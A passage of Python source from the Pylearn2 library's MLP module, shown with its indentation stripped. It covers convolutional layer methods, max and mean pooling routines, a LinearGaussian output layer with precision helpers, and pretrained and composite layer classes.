dummy_detector = dummy_detector.eval()
self.output_space = Conv2DSpace(shape=[dummy_detector.shape[2],
dummy_detector.shape[3]],
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
logger.info('Output space: {0}'.format(self.output_space.shape))
@wraps(Layer.set_input_space)
def set_input_space(self, space):
""" Note: this function will reset the parameters! """
self.input_space = space
if not isinstance(space, Conv2DSpace):
raise BadInputSpaceError(self.__class__.__name__ +
".set_input_space "
"expected a Conv2DSpace, got " +
str(space) + " of type " +
str(type(space)))
rng = self.mlp.rng
if self.border_mode == 'valid':
output_shape = [int((self.input_space.shape[0]
- self.kernel_shape[0])
/ self.kernel_stride[0]) + 1,
int((self.input_space.shape[1]
- self.kernel_shape[1])
/ self.kernel_stride[1]) + 1]
elif self.border_mode == 'full':
output_shape = [int((self.input_space.shape[0]
+ self.kernel_shape[0])
/ self.kernel_stride[0]) - 1,
int((self.input_space.shape[1]
+ self.kernel_shape[1])
/ self.kernel_stride[1]) - 1]
self.detector_space = Conv2DSpace(shape=output_shape,
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
self.initialize_transformer(rng)
W, = self.transformer.get_params()
W.name = self.layer_name + '_W'
if self.tied_b:
self.b = sharedX(np.zeros((self.detector_space.num_channels)) +
self.init_bias)
else:
self.b = sharedX(self.detector_space.get_origin() + self.init_bias)
self.b.name = self.layer_name + '_b'
logger.info('Input shape: {0}'.format(self.input_space.shape))
logger.info('Detector space: {0}'.format(self.detector_space.shape))
self.initialize_output_space()
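    # Worked shape example (assumed numbers, comment only): with a 32x32
    # input, a (5, 5) kernel, kernel_stride (1, 1) and border_mode 'valid',
    # the detector space is (32 - 5) / 1 + 1 = 28 on each side; with
    # border_mode 'full' it would be (32 + 5) / 1 - 1 = 36. A subsequent
    # (2, 2) max pooling with stride (2, 2) then gives a 14x14 output space.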
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.max_kernel_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=(1, 2, 3)))
desired_norms = T.clip(row_norms, 0, self.max_kernel_norm)
updates[W] = updated_W * (
desired_norms /
(1e-7 + row_norms)).dimshuffle(0, 'x', 'x', 'x')
@wraps(Layer.get_params)
def get_params(self):
assert self.b.name is not None
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
outp, inp, rows, cols = range(4)
raw = self.transformer._filters.get_value()
return np.transpose(raw, (outp, rows, cols, inp))
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
W, = self.transformer.get_params()
assert W.ndim == 4
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=(1, 2, 3)))
rval = OrderedDict([
('kernel_norms_min', row_norms.min()),
('kernel_norms_mean', row_norms.mean()),
('kernel_norms_max', row_norms.max()),
])
cst = self.cost
orval = self.nonlin.get_monitoring_channels_from_state(state,
targets,
cost_fn=cst)
rval.update(orval)
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
z = self.transformer.lmul(state_below)
if not hasattr(self, 'tied_b'):
self.tied_b = False
if self.tied_b:
b = self.b.dimshuffle('x', 0, 'x', 'x')
else:
b = self.b.dimshuffle('x', 0, 1, 2)
z = z + b
d = self.nonlin.apply(z)
if self.layer_name is not None:
d.name = self.layer_name + '_z'
self.detector_space.validate(d)
if self.pool_type is not None:
if not hasattr(self, 'detector_normalization'):
self.detector_normalization = None
if self.detector_normalization:
d = self.detector_normalization(d)
assert self.pool_type in ['max', 'mean'], ("pool_type should be"
"either max or mean"
"pooling.")
if self.pool_type == 'max':
p = max_pool(bc01=d, pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
elif self.pool_type == 'mean':
p = mean_pool(bc01=d, pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
self.output_space.validate(p)
else:
p = d
if not hasattr(self, 'output_normalization'):
self.output_normalization = None
if self.output_normalization:
p = self.output_normalization(p)
return p
def cost(self, Y, Y_hat):
"""
Cost for convnets is hardcoded to be the cost for sigmoids.
TODO: move the cost into the non-linearity class.
Parameters
----------
        Y : theano.gof.Variable
            Targets
        Y_hat : theano.gof.Variable
            Output of `fprop`
Returns
-------
cost : theano.gof.Variable
0-D tensor describing the cost
Notes
-----
Cost mean across units, mean across batch of KL divergence
KL(P || Q) where P is defined by Y and Q is defined by Y_hat
KL(P || Q) = p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
"""
assert self.nonlin.non_lin_name == "sigmoid", ("ConvElemwise "
"supports "
"cost function "
"for only "
"sigmoid layer "
"for now.")
batch_axis = self.output_space.get_batch_axis()
ave_total = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis)
ave = ave_total.mean()
return ave
class ConvRectifiedLinear(ConvElemwise):
"""
A convolutional rectified linear layer, based on theano's B01C
formatted convolution.
Parameters
----------
output_channels : int
The number of output channels the layer should have.
kernel_shape : tuple
The shape of the convolution kernel.
pool_shape : tuple
The shape of the spatial max pooling. A two-tuple of ints.
pool_stride : tuple
The stride of the spatial max pooling. Also must be square.
layer_name : str
A name for this layer that will be prepended to monitoring channels
related to this layer.
irange : float
if specified, initializes each weight randomly in
U(-irange, irange)
border_mode : str
A string indicating the size of the output:
- "full" : The output is the full discrete linear convolution of the
inputs.
- "valid" : The output consists only of those elements that do not
rely on the zero-padding. (Default)
include_prob : float
probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is initialized
to 0.
init_bias : float
All biases are initialized to this number
W_lr_scale : float
The learning rate on the weights for this layer is multiplied by this
scaling factor
b_lr_scale : float
The learning rate on the biases for this layer is multiplied by this
scaling factor
left_slope : float
The slope of the left half of the activation function
max_kernel_norm : float
        If specified, each kernel is constrained to have at most this norm.
pool_type :
        The type of the pooling operation performed after the convolution.
Default pooling type is max-pooling.
tied_b : bool
If true, all biases in the same channel are constrained to be the
same as each other. Otherwise, each bias at each location is
learned independently.
detector_normalization : callable
See `output_normalization`
output_normalization : callable
if specified, should be a callable object. the state of the
network is optionally replaced with normalization(state) at each
        of the 2 points in processing:
- detector: the rectifier units can be normalized prior to the
spatial pooling
- output: the output of the layer, after spatial pooling, can
be normalized as well
kernel_stride : tuple
The stride of the convolution kernel. A two-tuple of ints.
"""
def __init__(self,
output_channels,
kernel_shape,
pool_shape,
pool_stride,
layer_name,
irange=None,
border_mode='valid',
sparse_init=None,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
left_slope=0.0,
max_kernel_norm=None,
pool_type='max',
tied_b=False,
detector_normalization=None,
output_normalization=None,
kernel_stride=(1, 1),
monitor_style="classification"):
nonlinearity = RectifierConvNonlinearity(left_slope)
if (irange is None) and (sparse_init is None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvRectifiedLinear.")
elif (irange is not None) and (sparse_init is not None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvRectifiedLinear and not both.")
# Alias the variables for pep8
mkn = max_kernel_norm
dn = detector_normalization
on = output_normalization
super(ConvRectifiedLinear, self).__init__(output_channels,
kernel_shape,
layer_name,
nonlinearity,
irange=irange,
border_mode=border_mode,
sparse_init=sparse_init,
include_prob=include_prob,
init_bias=init_bias,
W_lr_scale=W_lr_scale,
b_lr_scale=b_lr_scale,
pool_shape=pool_shape,
pool_stride=pool_stride,
max_kernel_norm=mkn,
pool_type=pool_type,
tied_b=tied_b,
detector_normalization=dn,
output_normalization=on,
kernel_stride=kernel_stride,
monitor_style=monitor_style)
def pool_dnn(bc01, pool_shape, pool_stride, mode='max'):
"""
cuDNN pooling op.
Parameters
----------
bc01 : theano tensor
Minibatch in format (batch size, channels, rows, cols).
pool_shape : tuple
Shape of the pool region (rows, cols).
pool_stride : tuple
Strides between pooling regions (row stride, col stride).
mode : str
Flag for `mean` or `max` pooling.
Returns
-------
mx : theano tensor
The output of pooling applied to `bc01`.
"""
assert mode in ['max', 'mean']
if mode == 'mean':
raise NotImplementedError('Mean pooling is not implemented '
'in Pylearn2 using cuDNN as of '
'January 19th, 2015.')
mx = dnn_pool(bc01, tuple(pool_shape), tuple(pool_stride), mode)
return mx
def max_pool(bc01, pool_shape, pool_stride, image_shape, try_dnn=True):
"""
Theano's max pooling op only supports pool_stride = pool_shape
so here we have a graph that does max pooling with strides
Parameters
----------
bc01 : theano tensor
minibatch in format (batch size, channels, rows, cols)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
avoid doing some of the arithmetic in theano
try_dnn : bool
Flag to set cuDNN use (default: True).
Returns
-------
pooled : theano tensor
The output of pooling applied to `bc01`
See Also
--------
max_pool_c01b : Same functionality but with ('c', 0, 1, 'b') axes
sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality as
`max_pool_c01b` but GPU-only and considerably faster.
mean_pool : Mean pooling instead of max pooling
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
assert pr <= r
assert pc <= c
name = bc01.name
if name is None:
name = 'anon_bc01'
if try_dnn and bc01.dtype == "float32":
use_dnn = dnn_available()
else:
use_dnn = False
if pool_shape == pool_stride and not use_dnn:
mx = max_pool_2d(bc01, pool_shape, False)
mx.name = 'max_pool(' + name + ')'
return mx
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
# Catch case where p_strd > p_shp causes pool
# to be set outside of im_shp.
if p_strd * rval >= im_shp:
rval -= 1
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for bc01v in get_debug_values(bc01):
assert not contains_inf(bc01v)
assert bc01v.shape[2] == image_shape[0]
assert bc01v.shape[3] == image_shape[1]
if (required_r > r) or (required_c > c):
small_r = min(required_r, r)
small_c = min(required_c, c)
assert bc01.dtype.startswith('float')
wide_infinity = T.alloc(T.constant(-np.inf, dtype=bc01.dtype),
bc01.shape[0],
bc01.shape[1],
required_r,
required_c)
bc01 = T.set_subtensor(wide_infinity[:, :, 0:small_r, 0:small_c],
bc01[:, :, 0:small_r, 0:small_c])
name = 'infinite_padded_' + name
if use_dnn:
mx = pool_dnn(bc01, pool_shape, pool_stride, 'max')
else:
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = bc01[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
cur.name = ('max_pool_cur_' + name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
if mx is None:
mx = cur
else:
mx = T.maximum(mx, cur)
mx.name = ('max_pool_mx_' + name + '_' +
str(row_within_pool) + '_' +
str(col_within_pool))
mx.name = 'max_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
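# Usage sketch for `max_pool` (mirrors the `mean_pool` example further below;
# the array contents are made up for illustration):
#   >>> import numpy as np
#   >>> import theano
#   >>> import theano.tensor as T
#   >>> from pylearn2.models.mlp import max_pool
#   >>> X = np.arange(2 * 3 * 4 * 4, dtype='float32').reshape(2, 3, 4, 4)
#   >>> X_sym = T.tensor4('X')
#   >>> pooled = max_pool(X_sym, pool_shape=(2, 2), pool_stride=(2, 2),
#   ...                   image_shape=(4, 4))
#   >>> theano.function([X_sym], pooled)(X).shape
#   (2, 3, 2, 2)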
def max_pool_c01b(c01b, pool_shape, pool_stride, image_shape):
"""
Theano's max pooling op only supports pool_stride = pool_shape
so here we have a graph that does max pooling with strides
Parameters
----------
c01b : theano tensor
minibatch in format (channels, rows, cols, batch size)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
avoid doing some of the arithmetic in theano
Returns
-------
pooled : theano tensor
The output of pooling applied to `c01b`
See Also
--------
sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality but GPU-only
and considerably faster.
max_pool : Same functionality but with ('b', 0, 1, 'c') axes
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
assert pr > 0
assert pc > 0
assert pr <= r
assert pc <= c
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for c01bv in get_debug_values(c01b):
assert not contains_inf(c01bv)
assert c01bv.shape[1] == r
assert c01bv.shape[2] == c
wide_infinity = T.alloc(-np.inf,
c01b.shape[0],
required_r,
required_c,
c01b.shape[3])
name = c01b.name
if name is None:
        name = 'anon_c01b'
c01b = T.set_subtensor(wide_infinity[:, 0:r, 0:c, :], c01b)
c01b.name = 'infinite_padded_' + name
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = c01b[:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs,
:]
cur.name = ('max_pool_cur_' + c01b.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
if mx is None:
mx = cur
else:
mx = T.maximum(mx, cur)
mx.name = ('max_pool_mx_' + c01b.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
mx.name = 'max_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
def mean_pool(bc01, pool_shape, pool_stride, image_shape):
"""
Does mean pooling (aka average pooling) via a Theano graph.
Parameters
----------
bc01 : theano tensor
minibatch in format (batch size, channels, rows, cols)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
(rows, cols) tuple to avoid doing some arithmetic in theano
Returns
-------
pooled : theano tensor
The output of pooling applied to `bc01`
See Also
--------
max_pool : Same thing but with max pooling
Examples
--------
>>> import theano
>>> import theano.tensor as T
>>> from pylearn2.models.mlp import mean_pool
>>> import numpy as np
>>> t = np.array([[1, 1, 3, 3],
... [1, 1, 3, 3],
... [5, 5, 7, 7],
... [5, 5, 7, 7],
... [9, 9, 11, 11],
... [9, 9, 11, 11]])
>>> X = np.zeros((3, t.shape[0], t.shape[1]))
>>> X[:] = t
>>> X = X[np.newaxis]
>>> X_sym = T.tensor4('X')
>>> pool_it = mean_pool(X_sym, pool_shape=(2, 2), pool_stride=(2, 2),
... image_shape=(6, 4))
>>> f = theano.function(inputs=[X_sym], outputs=pool_it)
    This will pool over windows of size (2, 2) while also stepping by this
    same amount, shrinking the example input to [[1, 3], [5, 7], [9, 11]].
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for bc01v in get_debug_values(bc01):
assert not contains_inf(bc01v)
assert bc01v.shape[2] == image_shape[0]
assert bc01v.shape[3] == image_shape[1]
    # Pad with zeros rather than -inf: padded cells then contribute nothing
    # to the pooled sums, and bc01_count below excludes them from the counts
    # used to form the means.
    wide_infinity = T.alloc(T.constant(0, dtype=bc01.dtype),
                            bc01.shape[0],
                            bc01.shape[1],
                            required_r,
                            required_c)
name = bc01.name
if name is None:
name = 'anon_bc01'
bc01 = T.set_subtensor(wide_infinity[:, :, 0:r, 0:c], bc01)
bc01.name = 'infinite_padded_' + name
# Create a 'mask' used to keep count of the number of elements summed for
# each position
wide_infinity_count = T.alloc(0, bc01.shape[0], bc01.shape[1], required_r,
required_c)
bc01_count = T.set_subtensor(wide_infinity_count[:, :, 0:r, 0:c], 1)
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = bc01[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
cur.name = ('mean_pool_cur_' + bc01.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
cur_count = bc01_count[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
if mx is None:
mx = cur
count = cur_count
else:
mx = mx + cur
count = count + cur_count
mx.name = ('mean_pool_mx_' + bc01.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
mx /= count
mx.name = 'mean_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
@wraps(_WD)
def WeightDecay(*args, **kwargs):
warnings.warn("pylearn2.models.mlp.WeightDecay has moved to "
"pylearn2.costs.mlp.WeightDecay. This link"
"may be removed after 2015-05-13.")
return _WD(*args, **kwargs)
@wraps(_L1WD)
def L1WeightDecay(*args, **kwargs):
warnings.warn("pylearn2.models.mlp.L1WeightDecay has moved to "
"pylearn2.costs.mlp.WeightDecay. This link"
"may be removed after 2015-05-13.")
return _L1WD(*args, **kwargs)
class LinearGaussian(Linear):
"""
A Linear layer augmented with a precision vector, for modeling
conditionally Gaussian data.
    Specifically, given an input x, this layer models the distribution over
the output as
y ~ p(y | x) = N(y | Wx + b, beta^-1)
i.e., y is conditionally Gaussian with mean Wx + b and variance
beta^-1.
beta is a diagonal precision matrix so beta^-1 is a diagonal covariance
matrix.
Internally, beta is stored as the vector of diagonal values on this
matrix.
Since the output covariance is not a function of the input, this does
not provide an example-specific estimate of the error in the mean.
However, the vector-valued beta does mean that maximizing log p(y | x)
will reweight the mean squared error so that variables that can be
    estimated more easily will receive a higher penalty. This is one way of
    adapting the model better to heterogeneous data.
Parameters
----------
init_beta : float or ndarray
Any value > 0 that can be broadcasted to a vector of shape (dim, ).
The elements of beta are initialized to this value.
A good value is often the precision (inverse variance) of the target
variables in the training set, as provided by the
`beta_from_targets` function. This is the optimal beta for a dummy
model that just predicts the mean target value from the training set.
min_beta : float
The elements of beta are constrained to be >= this value.
This value must be > 0., otherwise the output conditional is not
constrained to be a valid probability distribution.
A good value is often the precision (inverse variance) of the target
variables in the training set, as provided by the
`beta_from_targets` function. This is the optimal beta for a dummy
model that just predicts the mean target value from the training set.
A trained model should always be able to obtain at least this much
precision, at least on the training set.
max_beta : float
The elements of beta are constrained to be <= this value.
We impose this constraint because for problems
where the training set values can be predicted
exactly, beta can grow without bound, which also makes the
gradients grow without bound, resulting in numerical problems.
    beta_lr_scale : float or None
        If not None, the learning rate on beta is multiplied by this
        scaling factor.
    kwargs : dict
        Arguments to the `Linear` superclass.
"""
def __init__(self, init_beta, min_beta, max_beta, beta_lr_scale, **kwargs):
super(LinearGaussian, self).__init__(**kwargs)
self.__dict__.update(locals())
del self.self
del self.kwargs
@wraps(Layer.set_input_space)
def set_input_space(self, space):
super(LinearGaussian, self).set_input_space(space)
assert isinstance(self.output_space, VectorSpace)
self.beta = sharedX(self.output_space.get_origin() + self.init_beta,
'beta')
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = super(LinearGaussian,
self).get_layer_monitoring_channels(state_below,
state,
targets)
assert isinstance(rval, OrderedDict)
rval['beta_min'] = self.beta.min()
rval['beta_mean'] = self.beta.mean()
rval['beta_max'] = self.beta.max()
if targets:
rval['mse'] = T.sqr(state - targets).mean()
return rval
@wraps(Linear.cost)
def cost(self, Y, Y_hat):
return (0.5 * T.dot(T.sqr(Y - Y_hat), self.beta).mean() -
0.5 * T.log(self.beta).sum())
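    # The cost above is the negative log-likelihood of the diagonal Gaussian,
    # averaged over examples, summed over output dimensions and with the
    # constant term dropped:
    #   -log N(y | y_hat, beta^-1) = 0.5 * beta * (y - y_hat)**2
    #                                - 0.5 * log(beta) + 0.5 * log(2 * pi)
    # so minimizing it fits the mean (through W and b) and the per-dimension
    # precision beta jointly.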
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
super(LinearGaussian, self)._modify_updates(updates)
if self.beta in updates:
updates[self.beta] = T.clip(updates[self.beta],
self.min_beta,
self.max_beta)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
rval = super(LinearGaussian, self).get_lr_scalers()
if self.beta_lr_scale is not None:
rval[self.beta] = self.beta_lr_scale
return rval
@wraps(Layer.get_params)
def get_params(self):
return super(LinearGaussian, self).get_params() + [self.beta]
def beta_from_design(design, min_var=1e-6, max_var=1e6):
"""
Returns the marginal precision of a design matrix.
Parameters
----------
design : ndarray
A numpy ndarray containing a design matrix
min_var : float
max_var : float
All variances are constrained to lie in the range [min_var, max_var]
to avoid numerical issues like infinite precision.
Returns
-------
beta : ndarray
A 1D vector containing the marginal precision of each variable in the
design matrix.
"""
return 1. / np.clip(design.var(axis=0), min_var, max_var)
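# Quick illustration (made-up data, comment only): a column with variance
# 0.25 gets precision 4, while a constant column is clipped to 1 / min_var.
#   >>> import numpy as np
#   >>> beta = beta_from_design(np.array([[0., 1.], [1., 1.]]))
#   >>> beta[0], beta[1]
#   (4.0, 1000000.0)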
def beta_from_targets(dataset, **kwargs):
"""
Returns the marginal precision of the targets in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
A DenseDesignMatrix with a targets field `y`
kwargs : dict
Extra arguments to `beta_from_design`
Returns
-------
beta : ndarray
A 1-D vector containing the marginal precision of the *targets* in
`dataset`.
"""
return beta_from_design(dataset.y, **kwargs)
def beta_from_features(dataset, **kwargs):
"""
Returns the marginal precision of the features in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
The dataset to compute the precision on.
kwargs : dict
Passed through to `beta_from_design`
Returns
-------
beta : ndarray
Vector of precision values for each feature in `dataset`
"""
return beta_from_design(dataset.X, **kwargs)
def mean_of_targets(dataset):
"""
Returns the mean of the targets in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
Returns
-------
mn : ndarray
A 1-D vector with entry i giving the mean of target i
"""
return dataset.y.mean(axis=0)
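# Typical wiring sketch (hypothetical `train_set` and sizes, comment only):
# the helpers above are intended to seed a LinearGaussian output layer from
# training-set statistics, e.g.
#   >>> beta = beta_from_targets(train_set)
#   >>> output = LinearGaussian(init_beta=beta, min_beta=beta.min(),
#   ...                         max_beta=1e6, beta_lr_scale=1.,
#   ...                         dim=train_set.y.shape[1], layer_name='y',
#   ...                         irange=.005,
#   ...                         init_bias=mean_of_targets(train_set))
#   >>> mlp = MLP(nvis=train_set.X.shape[1],
#   ...           layers=[Tanh(dim=100, layer_name='h0', irange=.05), output])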
class PretrainedLayer(Layer):
"""
A layer whose weights are initialized, and optionally fixed,
based on prior training.
Parameters
----------
layer_content : Model
Should implement "upward_pass" (RBM and Autoencoder do this)
    freeze_params : bool
        If True, regard layer_content's parameters as fixed
If False, they become parameters of this layer and can be
fine-tuned to optimize the MLP's cost function.
"""
def __init__(self, layer_name, layer_content, freeze_params=False):
super(PretrainedLayer, self).__init__()
self.__dict__.update(locals())
del self.self
@wraps(Layer.set_input_space)
def set_input_space(self, space):
assert self.get_input_space() == space
@wraps(Layer.get_params)
def get_params(self):
if self.freeze_params:
return []
return self.layer_content.get_params()
@wraps(Layer.get_input_space)
def get_input_space(self):
return self.layer_content.get_input_space()
@wraps(Layer.get_output_space)
def get_output_space(self):
return self.layer_content.get_output_space()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
return OrderedDict([])
@wraps(Layer.fprop)
def fprop(self, state_below):
return self.layer_content.upward_pass(state_below)
class CompositeLayer(Layer):
"""
A Layer that runs several layers in parallel. Its default behavior
is to pass the layer's input to each of the components.
Alternatively, it can take a CompositeSpace as an input and a mapping
from inputs to layers i.e. providing each component layer with a
subset of the inputs.
Parameters
----------
layer_name : str
The name of this layer
layers : tuple or list
The component layers to run in parallel.
inputs_to_layers : dict mapping int to list of ints, optional
Can only be used if the input space is a CompositeSpace.
If inputs_to_layers[i] contains j, it means input i will
be given as input to component j. Note that if multiple inputs are
passed on to e.g. an inner CompositeLayer, the same order will
be maintained. If the list is empty, the input will be discarded.
If an input does not appear in the dictionary, it will be given to
all components.
Examples
--------
>>> composite_layer = CompositeLayer(
... layer_name='composite_layer',
    ...     layers=[Tanh(7, 'h0', 0.1),
    ...             Sigmoid(dim=5, layer_name='h1', irange=0.1)],
... inputs_to_layers={
... 0: [1],
... 1: [0]
... })
This CompositeLayer has a CompositeSpace with 2 subspaces as its
input space. The first input is given to the Sigmoid layer, the second
input is given to the Tanh layer.
>>> wrapper_layer = CompositeLayer(
... layer_name='wrapper_layer',
... layers=[Linear(9, 'h2', 0.1),
... composite_layer,
... Tanh(7, 'h3', 0.1)],
... inputs_to_layers={
... 0: [1],
... 2: []
... })
This CompositeLayer takes 3 inputs. The first one is given to the
inner CompositeLayer. The second input is passed on to each component
layer i.e. to the Tanh, Linear as well as CompositeLayer. The third
    input is discarded. Note that the inner CompositeLayer will receive
the inputs with the same ordering i.e. [0, 1], and never [1, 0].
"""
def __init__(self, layer_name, layers, inputs_to_layers=None):
self.num_layers = len(layers)
if inputs_to_layers is not None:
if not isinstance(inputs_to_layers, dict):
raise TypeError("CompositeLayer expected inputs_to_layers to "
"be dict, got " + str(type(inputs_to_layers)))
self.inputs_to_layers = OrderedDict()
for key in sorted(inputs_to_layers):
assert isinstance(key, py_integer_types)
value = inputs_to_layers[key]
assert is_iterable(value)
assert all(isinstance(v, py_integer_types) for v in value)
# Check 'not value' to support case of empty list
assert not value or all(0 <= v < self.num_layers
for v in value)
self.inputs_to_layers[key] = sorted(value)
super(CompositeLayer, self).__init__()
self.__dict__.update(locals())
del self.self
@property
def routing_needed(self):
return self.inputs_to_layers is not None
@wraps(Layer.set_input_space)
def set_input_space(self, space):
if not isinstance(space, CompositeSpace):
if self.inputs_to_layers is not None:
raise ValueError("CompositeLayer received an inputs_to_layers "
"mapping, but does not have a CompositeSpace "
"as its input space, so there is nothing to "
"map. Received " + str(space) + " as input "
"space.")
elif self.routing_needed:
if not max(self.inputs_to_layers) < len(space.components):
raise ValueError("The inputs_to_layers mapping of "
"CompositeSpace contains they key " +
str(max(self.inputs_to_layers)) + " "
"(0-based) but the input space only "
"contains " + str(self.num_layers) + " "
"layers.")
# Invert the dictionary
self.layers_to_inputs = OrderedDict()
for i in xrange(self.num_layers):
inputs = []
for j in xrange(len(space.components)):
if j in self.inputs_to_layers:
if i in self.inputs_to_layers[j]:
inputs.append(j)
else:
inputs.append(j)
self.layers_to_inputs[i] = inputs
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_space = space.restrict(self.layers_to_inputs[i])
else:
cur_space = space
layer.set_input_space(cur_space)
self.input_space = space
self.output_space = CompositeSpace(tuple(layer.get_output_space()
for layer in self.layers))
self._target_space = CompositeSpace(tuple(layer.get_target_space()
for layer in self.layers))
@wraps(Layer.get_params)
def get_params(self):
rval = []
for layer in self.layers:
rval = safe_union(layer.get_params(), rval)
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
rvals = []
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_state_below = [state_below[j]
for j in self.layers_to_inputs[i]]
# This is to mimic the behavior of CompositeSpace's restrict
